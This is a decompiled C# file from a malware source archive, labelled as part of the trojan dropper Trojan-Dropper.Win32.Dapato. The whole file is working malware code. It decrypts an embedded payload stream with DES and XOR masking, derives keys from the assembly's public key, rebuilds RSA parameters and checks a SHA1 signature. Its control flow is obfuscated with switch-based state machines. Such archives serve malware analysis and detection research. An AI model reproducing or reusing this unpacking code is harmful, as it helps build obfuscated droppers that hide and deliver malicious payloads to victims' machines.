MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/l.cs

// Decompiled with JetBrains decompiler
// Type: l
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe

using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;

internal sealed class l
{
  private const int a = 8;
  private const int b = 20;
  private const int c = 4;
  private static byte[] d = new byte[4];
  private static byte[] e;

  static l()
  {
label_2:
    int num = 0;
    while (true)
    {
      switch (num)
      {
        case 0:
          l.e = new byte[4];
          num = 4;
          continue;
        case 1:
          l.d[1] = l.e[1] = (byte) 83;
          num = 3;
          continue;
        case 2:
          l.e[3] = (byte) 50;
          num = 6;
          continue;
        case 3:
          l.d[2] = l.e[2] = (byte) 65;
          num = 5;
          continue;
        case 4:
          l.d[0] = l.e[0] = (byte) 82;
          num = 1;
          continue;
        case 5:
          l.d[3] = (byte) 49;
          num = 2;
          continue;
        case 6:
          goto label_9;
        default:
          goto label_2;
      }
    }
label_9:;
  }

  public static MemoryStream a(Stream a)
  {
    BinaryReader binaryReader1 = new BinaryReader(a);
    DESCryptoServiceProvider cryptoServiceProvider = new DESCryptoServiceProvider();
    bool flag1 = binaryReader1.ReadBoolean();
    int count1 = (int) binaryReader1.ReadUInt16();
    byte[] buffer1 = new byte[count1];
    binaryReader1.Read(buffer1, 0, count1);
    if ((!flag1 ? 1 : 0) == 0)
    {
      byte[] buffer2 = new byte[8];
      binaryReader1.Read(buffer2, 0, 8);
      for (int index = 0; index < count1; ++index)
        buffer1[index] = (byte) ((uint) buffer1[index] ^ (uint) buffer2[index % 8]);
    }
    BinaryReader binaryReader2 = new BinaryReader((Stream) new MemoryStream(buffer1, false));
label_6:
    int num = 7;
    int count2;
    int count3;
    bool flag2;
    byte[] numArray1;
    byte[] buffer3;
    bool flag3;
    while (true)
    {
      switch (num)
      {
        case 0:
          count2 = (int) binaryReader2.ReadByte();
          num = 3;
          continue;
        case 1:
          count3 = (int) binaryReader2.ReadByte();
          num = 8;
          continue;
        case 2:
          flag2 = binaryReader2.ReadBoolean();
          num = 0;
          continue;
        case 3:
          numArray1 = new byte[count2];
          num = 4;
          continue;
        case 4:
          if (flag2)
          {
            num = 10;
            continue;
          }
          goto label_19;
        case 5:
          binaryReader2.Read(buffer3, 0, count3);
          num = 6;
          continue;
        case 6:
          cryptoServiceProvider.IV = buffer3;
          num = 2;
          continue;
        case 7:
          binaryReader2.ReadString();
          num = 9;
          continue;
        case 8:
          buffer3 = new byte[count3];
          num = 5;
          continue;
        case 9:
          flag3 = binaryReader2.ReadBoolean();
          num = 1;
          continue;
        case 10:
          goto label_18;
        default:
          goto label_6;
      }
    }
label_18:
    binaryReader2.Read(numArray1, 0, count2);
label_19:
    RSACryptoServiceProvider a1 = (RSACryptoServiceProvider) null;
    int count4 = binaryReader2.ReadInt32();
    byte[] numArray2 = new byte[count4];
    binaryReader2.Read(numArray2, 0, count4);
    if (!flag2)
    {
      byte[] publicKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey();
      if (publicKey == null || publicKey.Length != 160)
        throw new InvalidOperationException();
      Buffer.BlockCopy((Array) publicKey, 12, (Array) numArray1, 0, count2);
      numArray1[5] |= (byte) 128;
      a1 = new RSACryptoServiceProvider();
      a1.ImportParameters(l.a(publicKey));
    }
    cryptoServiceProvider.Key = numArray1;
    MemoryStream a2 = new MemoryStream();
    using (CryptoStream a3 = new CryptoStream(binaryReader1.BaseStream, cryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Read))
    {
      if (flag3)
        j.a((Stream) a3, (Stream) a2);
      else
        l.a((Stream) a3, (Stream) a2);
    }
    if (a1 != null)
    {
      a2.Position = 0L;
      if (!l.a(a1, (Stream) a2, numArray2))
        throw new InvalidOperationException();
    }
    a2.Position = 0L;
    return a2;
  }

  private static byte[] a(byte[] a1, int a2, int a3)
  {
    if ((a1 == null ? 1 : 0) == 0)
    {
label_2:
      int num = 0;
      while (true)
      {
        switch (num)
        {
          case 0:
            if (a1.Length < a2 + a3)
            {
              num = 1;
              continue;
            }
            goto label_6;
          case 1:
            goto label_5;
          default:
            goto label_2;
        }
      }
label_6:
      byte[] destinationArray = new byte[a3];
      Array.Copy((Array) a1, a2, (Array) destinationArray, 0, a3);
      return destinationArray;
    }
label_5:
    return (byte[]) null;
  }

  private static void a(Stream a1, Stream a2)
  {
    byte[] buffer = new byte[4096];
    while (true)
    {
      int count = a1.Read(buffer, 0, buffer.Length);
      if ((count <= 0 ? 0 : 1) != 0)
        a2.Write(buffer, 0, count);
      else
        break;
    }
  }

  private static RSAParameters a(byte[] a)
  {
    bool flag = a.Length == 160;
    if ((!flag ? 1 : 0) == 0 && !l.a(a, l.d, 20))
      return new RSAParameters();
    if (!flag && !l.a(a, l.e, 8))
      return new RSAParameters();
    RSAParameters rsaParameters = new RSAParameters();
    int a1 = (flag ? 20 : 8) + 8;
    int a2 = 4;
    rsaParameters.Exponent = l.a(a, a1, a2);
    Array.Reverse((Array) rsaParameters.Exponent);
    int a3 = a1 + a2;
    int a4 = 128;
    rsaParameters.Modulus = l.a(a, a3, a4);
    Array.Reverse((Array) rsaParameters.Modulus);
    if (flag)
      return rsaParameters;
    int a5 = a3 + a4;
label_8:
    int num = 14;
    while (true)
    {
      switch (num)
      {
        case 0:
          rsaParameters.P = l.a(a, a5, a4);
          num = 12;
          continue;
        case 1:
          rsaParameters.DQ = l.a(a, a5, a4);
          num = 6;
          continue;
        case 2:
          a5 += a4;
          num = 15;
          continue;
        case 3:
          rsaParameters.D = l.a(a, a5, a4);
          num = 10;
          continue;
        case 4:
          a5 += a4;
          num = 7;
          continue;
        case 5:
          rsaParameters.InverseQ = l.a(a, a5, a4);
          num = 9;
          continue;
        case 6:
          Array.Reverse((Array) rsaParameters.DQ);
          num = 2;
          continue;
        case 7:
          a4 = 64;
          num = 1;
          continue;
        case 8:
          a4 = 64;
          num = 17;
          continue;
        case 9:
          Array.Reverse((Array) rsaParameters.InverseQ);
          num = 13;
          continue;
        case 10:
          Array.Reverse((Array) rsaParameters.D);
          num = 23;
          continue;
        case 11:
          Array.Reverse((Array) rsaParameters.DP);
          num = 4;
          continue;
        case 12:
          Array.Reverse((Array) rsaParameters.P);
          num = 16;
          continue;
        case 13:
          a5 += a4;
          num = 19;
          continue;
        case 14:
          a4 = 64;
          num = 0;
          continue;
        case 15:
          a4 = 64;
          num = 5;
          continue;
        case 16:
          a5 += a4;
          num = 21;
          continue;
        case 17:
          rsaParameters.DP = l.a(a, a5, a4);
          num = 11;
          continue;
        case 18:
          rsaParameters.Q = l.a(a, a5, a4);
          num = 20;
          continue;
        case 19:
          a4 = 128;
          num = 3;
          continue;
        case 20:
          Array.Reverse((Array) rsaParameters.Q);
          num = 22;
          continue;
        case 21:
          a4 = 64;
          num = 18;
          continue;
        case 22:
          a5 += a4;
          num = 8;
          continue;
        case 23:
          goto label_32;
        default:
          goto label_8;
      }
    }
label_32:
    return rsaParameters;
  }

  private static bool a(byte[] a1, byte[] a2, int a3)
  {
    int index = 0;
    if ((index == 0 ? 1 : 0) != 0)
      goto label_7;
    else
      goto label_2;
label_1:
    int num;
    switch (num)
    {
      case 0:
        goto label_3;
      case 1:
        return false;
    }
label_2:
    num = 0;
    goto label_1;
label_3:
    if ((int) a1[index + a3] != (int) a2[index])
    {
      num = 1;
      goto label_1;
    }
    else
      ++index;
label_7:
    if (index >= a2.Length)
      return true;
    goto label_3;
  }

  private static bool a(RSACryptoServiceProvider a1, Stream a2, byte[] a3)
  {
    SHA1CryptoServiceProvider cryptoServiceProvider = new SHA1CryptoServiceProvider();
label_2:
    int num = 0;
    byte[] hash;
    string name;
    while (true)
    {
      switch (num)
      {
        case 0:
          hash = cryptoServiceProvider.ComputeHash(a2);
          num = 3;
          continue;
        case 1:
          name += (string) (object) 'A';
          num = 4;
          continue;
        case 2:
          name += (string) (object) 'H';
          num = 1;
          continue;
        case 3:
          name = new string('S', 1);
          num = 2;
          continue;
        case 4:
          name += (string) (object) '1';
          num = 5;
          continue;
        case 5:
          goto label_8;
        default:
          goto label_2;
      }
    }
label_8:
    return a1.VerifyHash(hash, CryptoConfig.MapNameToOID(name), a3);
  }
}